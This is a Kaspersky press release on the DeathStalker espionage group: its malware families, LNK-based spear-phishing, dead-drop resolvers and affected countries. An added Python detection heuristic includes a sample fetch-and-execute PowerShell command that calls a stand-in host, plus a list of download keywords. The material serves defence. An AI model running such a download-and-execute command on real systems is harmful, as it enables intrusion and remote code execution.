Kaspersky experts report that the APT group DeathStalker is spying on Swiss SMEs in particular. The group also has other medium-sized companies worldwide in its sights; victims are frequently found in the financial industry and among law firms.
The APT group DeathStalker has been spying on small and medium-sized companies in the financial sector since at least 2012. The latest Kaspersky research shows that DeathStalker has targeted companies in Switzerland and around the world.
DeathStalker specializes in cyber espionage against law firms and organizations in the financial sector. The threat actor is highly adaptable and stands out for its iterative, fast and flexible approach to software design, which is what lets it run campaigns effectively.
Individual activity spectrum makes detection difficult
Kaspersky experts have now been able to link DeathStalker's activities to three malware families, Powersing, Evilnum and Janicab, which shows the group's broad spectrum of activity since at least 2012. While Kaspersky identified Powersing as early as 2018, findings on Evilnum and Janicab were reported by other cybersecurity vendors. Analysis of code similarities and victimology between the three malware families made it possible to link them with medium confidence.
The group's tactics, techniques and procedures have remained unchanged over the years: they use individually crafted spear-phishing emails to deliver archives containing malicious files. If a user clicks on the shortcut inside the archive, a malicious script is executed and further components are downloaded from the Internet. In this way, the attackers gain control of the infected device.
DeathStalker uses Powersing attacks
Powersing, a PowerShell-based implant, was the first malware that could be attributed to this threat actor. Once a victim's computer is infected, the malware can take screenshots and run arbitrary PowerShell scripts. Alternative persistence methods, tailored individually to the security solution installed on the infected device, allow the malware to evade detection; DeathStalker carries out detection tests before each campaign and updates the scripts accordingly.
In a Powersing attack, DeathStalker also uses a well-known public service to blend the initial backdoor communication into legitimate network traffic, which severely limits the possibilities for disrupting such an operation. By using dead-drop resolvers (pieces of information pointing to additional command-and-control infrastructure, placed on a variety of legitimate social media, blogging and messaging services), DeathStalker was able to evade detection and quickly wind down a campaign. Once infected, victims contact these resolvers and are redirected by them, which hides the communication chain.
DeathStalker affects businesses worldwide
DeathStalker's activity has been observed all over the world. Powersing activity was found in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the United Kingdom and the United Arab Emirates. Kaspersky also found Evilnum victims in Cyprus, India, Lebanon, Russia and the United Arab Emirates. Detailed information on indicators of compromise related to this group, including file hashes and C2 servers, can be found on the Kaspersky Threat Intelligence Portal [2].
"DeathStalker is a prime example of a threat actor that private sector organizations need to defend against," said Ivan Kwiatkowski, security researcher at Kaspersky. "While we often focus on the activities of APT groups, DeathStalker reminds us that even organizations that are not traditionally the most security-conscious need to know they can be targeted. Additionally, due to continued activity, we anticipate that DeathStalker will continue to be a threat to organizations worldwide through the use of new tools. This actor is further proof that even small and medium-sized businesses need to invest in security and awareness training. To remain protected from DeathStalker, we advise organizations to disable the ability to use scripting languages such as powershell.exe and cscript.exe wherever possible. We also recommend that future awareness training and security product assessments include infection chains based on LNK (shortcut) files."
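The infection chain described above (shortcut click, script host, download of further components) and the advice to restrict powershell.exe and cscript.exe can be turned into a simple hunting heuristic over process-creation telemetry. The following Python is an added example and not Kaspersky's detection logic; the Sysmon-style records are constructed, and the user-writable paths, the inclusion of wscript.exe and the download keywords are assumptions made for this example.

```python
import re
from pathlib import PureWindowsPath

# Script engines named in the advice (powershell.exe, cscript.exe) plus
# wscript.exe, the GUI sibling of cscript.exe (assumption: same risk class).
SCRIPT_HOSTS = {"powershell.exe", "cscript.exe", "wscript.exe"}

# Where an opened archive and its extracted shortcut/script usually land
# (assumed locations for this heuristic, not taken from the article).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\", re.I)
# Primitives a first-stage script uses to fetch further components (assumed set).
DOWNLOAD_PRIMITIVE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|xmlhttp", re.I)


def reasons_for(event: dict) -> list[str]:
    """Why a process-creation event looks like an LNK-driven first stage.

    Empty list means not flagged. Requires the shortcut-click context (parent
    explorer.exe) plus at least one content indicator, so an analyst opening an
    interactive PowerShell from the Start menu is not reported.
    """
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    if image not in SCRIPT_HOSTS or parent != "explorer.exe":
        return []
    reasons = ["script host launched by explorer.exe (consistent with a shortcut click)"]
    if USER_WRITABLE.search(event["CommandLine"]):
        reasons.append("script path in a user-writable location")
    if DOWNLOAD_PRIMITIVE.search(event["CommandLine"]):
        reasons.append("command line contains a download primitive")
    return reasons if len(reasons) > 1 else []


def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Map ProcessId -> reasons for every flagged event."""
    return {e["ProcessId"]: r for e in events if (r := reasons_for(e))}


# Constructed Sysmon-style events (not real telemetry). 101 and 102 should be
# flagged; 103 (service-launched backup script) and 104 (plain shell) should not.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ProcessId": 101, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r'cscript.exe //E:jscript "C:\Users\alice\AppData\Local\Temp\Invoice.js"'},
    {"ProcessId": 102, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://dead-drop.example/p')\""},
    {"ProcessId": 103, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\ProgramData\Backup\nightly.ps1"},
    {"ProcessId": 104, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell.exe"},
]
```

Run `hunt(EVENTS)` to see only process IDs 101 and 102 reported, each with the reasons that triggered the match.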
More on this at Securelist by Kaspersky.
About Kaspersky
Kaspersky is an international cybersecurity company founded in 1997. Kaspersky's in-depth threat intelligence and security expertise serve as the basis for innovative security solutions and services to protect companies, critical infrastructures, governments and private users worldwide. The company's comprehensive security portfolio includes leading endpoint protection as well as a range of specialized security solutions and services to defend against complex and evolving cyber threats. Kaspersky technologies protect over 400 million users and 250,000 corporate customers. More information about Kaspersky can be found at www.kaspersky.com/